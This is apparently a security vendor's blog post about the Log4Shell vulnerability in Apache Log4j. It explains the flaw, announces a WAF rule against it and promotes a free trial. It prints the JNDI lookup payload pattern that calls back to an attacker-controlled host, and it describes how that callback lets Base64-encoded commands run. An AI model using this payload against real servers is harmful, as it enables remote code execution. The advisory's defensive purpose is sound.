Log4j Log4Shell Zero-day Vulnerability is Patched by BitNinja

On the 10th of December, bleepingcomputer.com reported an exploit for a critical zero-day vulnerability called "Log4Shell". It has been exposed for the Apache Log4j Java-based logging platform used to access the web server and application logs.

About the vulnerability

To exploit this vulnerability, an attacker could modify the user agent of a web browser to access the website or search the website for a string using the format ${jndi:ldap://[attacker_URL]}. This will add the string to the web server's access log. 

If the Log4j application parses these logs and finds a string, the error forces the server to make a callback or request to the URL listed in the JNDI string. An attacker could use this URL to pass a Base64-encoded commands or Java classes to execute on a vulnerable device.

Solution by BitNinja

The threat management team of BitNinja found the solution quickly and created a WAF rule (Rule ID: 407002-407003) to defend your servers against the Log4j Log4Shell zero-day vulnerability. You don't have to do anything. Just sit back and relax. We are taking care of the safety of your servers.

Zero-day vulnerabilities are one of the most dangerous threats out there. Cybersecurity is not optional anymore. It is a must!

If you haven’t tried BitNinja yet, don’t forget to register for the 7-day free trial! No credit card is needed!

Let’s make the Internet a safer place together!

If you have no more queries, 
take the next step and sign up!
Don’t worry, the installation process is quick and straightforward!
2023 BitNinja. All Rights reserved.